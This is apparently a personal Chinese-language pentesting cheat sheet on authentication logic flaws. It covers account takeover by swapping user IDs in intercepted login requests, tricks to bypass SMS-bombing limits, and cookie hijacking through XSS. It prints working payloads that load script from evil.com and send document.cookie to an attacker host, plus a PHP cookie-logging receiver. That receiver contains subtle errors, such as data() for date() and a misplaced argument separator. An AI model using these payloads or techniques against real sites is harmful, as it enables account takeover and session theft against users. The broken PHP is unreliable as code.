参考文章
https://www.anugrahsr.me/posts/10-Password-reset-flaws/
验证码不校验 验证码未绑定用户 本地验证绕过 未校验用户字段 cookie值替换
场景 - 登录
服务端
1. (1)拿到想要登录账号id (2)注册账号登录-》退出登录-》登录拦截->修改id值为想要登录账号id-》成功登录想要登录账号
客户端
2.
(1)拿到想要登录账号id
(2)注册账号登录-》拦截修改返回包id-》账号界面状态改变(但无实际权限)
短信轰炸
X-Forwarded-For
首加86 空格
尾加 . , + - ; \n %0a %00
Cookie劫持
http://www.a.com/test.php?abc="><script src =http://evil.com/evil.js></script> evil.js content: var img = document.createElement("img"); img.src = "http://www.evil.com/log?"+escape(document.cookie); document.body.appendChild(img); PS:log不一定要存在,因为在日志中会记录下这个过程 上面演示的就是最基本的xss 劫持Cookie的过程, 当你拿到用户cookie后,怎么用它登录服务器呢?在这个过程,方法很多,这里有两种方法: Burpsuit proxy 修改cookie Firefox 插件 Data Tamper 截断请求修改cookie <?php $cookie = $_GET['c']; $ip = getenv('REMOTE_ADDR'); $time = data("j F, Y, g:i a"); $referer = getenv('HTTP_REFERER'); $fp = fopen('cookie.txt','a'); fwrite($fp.'Cookie: '.$cookie.'<br/> IP: '.$ip.'<br> Data and Time: '.$time.'<br>Referer: '.$referer.'<br><br>'); fclose($fp); ?> 将上述保存到自己服务器上,1.php 然后在XSS处写入: <script>document.location="http://your server/1.php?c="+document.cookie;</script>